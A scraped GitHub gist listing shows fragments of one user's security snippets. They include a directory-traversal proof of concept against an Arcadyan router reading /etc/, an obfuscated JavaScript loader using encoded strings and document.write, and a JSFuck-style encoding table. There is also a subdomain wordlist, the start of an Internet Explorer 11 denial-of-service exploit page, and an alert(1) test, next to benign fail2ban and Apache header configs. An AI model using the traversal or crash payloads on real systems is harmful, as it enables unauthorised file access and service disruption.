POC :-
/html/filetree_get.stm?ep=1&t=tree&id=&p=/usb/../../../../../../../../../../../../../../../../etc/
PacodiazDG
/ http-get-dos.conf
Created
April 12, 2017 06:01
— forked from SamStudio8/http-get-dos.conf
Simple fail2ban DOS jail
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Fail2Ban configuration file | |
| # | |
| # NOTE | |
| # You should set up in the jail.conf file, the maxretry and findtime carefully in order to avoid false positives. | |
| # | |
| # Author: http://www.go2linux.org | |
| # Modified by: samnicholls.net | |
| # * Mon 6 Jun 2016 - Updated failregex to capture HOST group correctly | |
| [Definition] |
PacodiazDG
/ mod_headers.txt
Last active
July 5, 2017 07:22
Enabling mod_headers on apache2 || apache2.conf
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Add this line to "\etc\apache2\apache2.conf" | |
| # <-------------------------------------------------------------> | |
| # LoadModule headers_module /usr/lib/apache2/modules/mod_headers.so | |
| <IfModule mod_headers.c> | |
| Header set x-frame-options "deny" | |
| Header set X-Content-Type-Options "nosniff" | |
| Header set X-XSS-Protection "1; mode=block" | |
| Header set cache-control "no-store, no-cache, must-revalidate, post-check=0, pre-check=0" | |
| </IfModule> | |
| # <-------------------------------------------------------------> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| if(window.console || 'console' in window) { | |
| console.log('%c \x6a\x61\x6a\x61\x6a\x61\x20\x70\x65\x6e\x64\x65\x6a\x6f\x21\x21\x21 ', 'color:#FF0000; font-size:40px;'); | |
| } if((self.parent&&!(self.parent===self))&&(self.parent.frames.length!=0)) { | |
| console.log('\x25\x63\x20\x4f\x4b\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20', 'color:#FFD100; font-size:17px;'); | |
| location.replace("\40\141\142\157\165\164\72\142\154\141\156\153"); | |
| }var ud=""; | |
| document.write(atob('\x50\x47\x6c\x6d\x63\x6d\x46\x74\x5a\x53\x42\x33\x61\x57\x52\x30\x61\x44\x30\x69\x4d\x43\x49\x67\x61\x47\x56\x70\x5a\x32\x68\x30\x50\x53\x49\x77\x49\x69\x42\x7a\x63\x6d\x4d\x39\x49\x6d\x68\x30\x64\x48\x42\x7a\x4f\x69\x38\x76\x64\x33\x64\x33\x4c\x6e\x6c\x76\x64\x58\x52\x31\x59\x6d\x55\x75\x59\x32\x39\x74\x4c\x32\x56\x74\x59\x6d\x56\x6b\x4c\x33\x67\x79\x53\x31\x42\x76\x53\x32\x68\x48\x57\x55\x56\x52\x50\x32\x46\x31\x64\x47\x39\x77\x62\x47\x46\x35\x50\x54\x45\x6 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'a':'((!!+[]+"")[+!![]])', | |
| 'b':'((({})+"")[(+!![])+(+!![])])', | |
| 'c':'((({})+"")[(+!![])+(+!![])+(+!![])+(+!![])+(+!![])])', | |
| 'd':'((({})[""]+"")[(+!![])+(+!![])])', | |
| 'e':'((!!+[]+"")[(+!![])+(+!![])+(+!![])+(+!![])])', | |
| 'f':'((!!+[]+"")[+[]])', | |
| 'g':'"\\x67"', | |
| 'h':'"\\x68"', | |
| 'i':'((+!![]/+[]+"")[(+!![])+(+!![])+(+!![])])', | |
| 'j':'((({})+"")[(+!![])+(+!![])+(+!![])])', |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| www | |
| ftp | |
| localhost | |
| webmail | |
| smtp | |
| pop | |
| ns1 | |
| webdisk | |
| ns2 |
PacodiazDG
/ .js
Created
March 4, 2018 20:07
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| document.onkeyup= (e) => { | |
| var e = e || window.event; | |
| if(e.which == 17||e.which == 73) { | |
| window.open(`${window.location.href}/direccion`,'_blank','noopener'); | |
| return false; | |
| } | |
| } |
PacodiazDG
/ aa.htm
Created
April 25, 2018 16:20
Microsoft Internet Explorer 11.371.16299.0 Denial Of Service Exploit
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html> | |
| <head> | |
| <title></title> | |
| </head> | |
| <body> | |
| <center> | |
| MSIE v11.371.16299 Denial Of Service by hyp3rlinx | |
| <br> | |
| <a href=".cmd:" id="hate">crashy ware shee</a> |
PacodiazDG
/ Arcadyan 'path' Directory Traversal.md
Created
September 23, 2018 04:47
Arcadyan 'path' Directory Traversal
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| dcdsdscdscds |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| alert(1); |
OlderNewer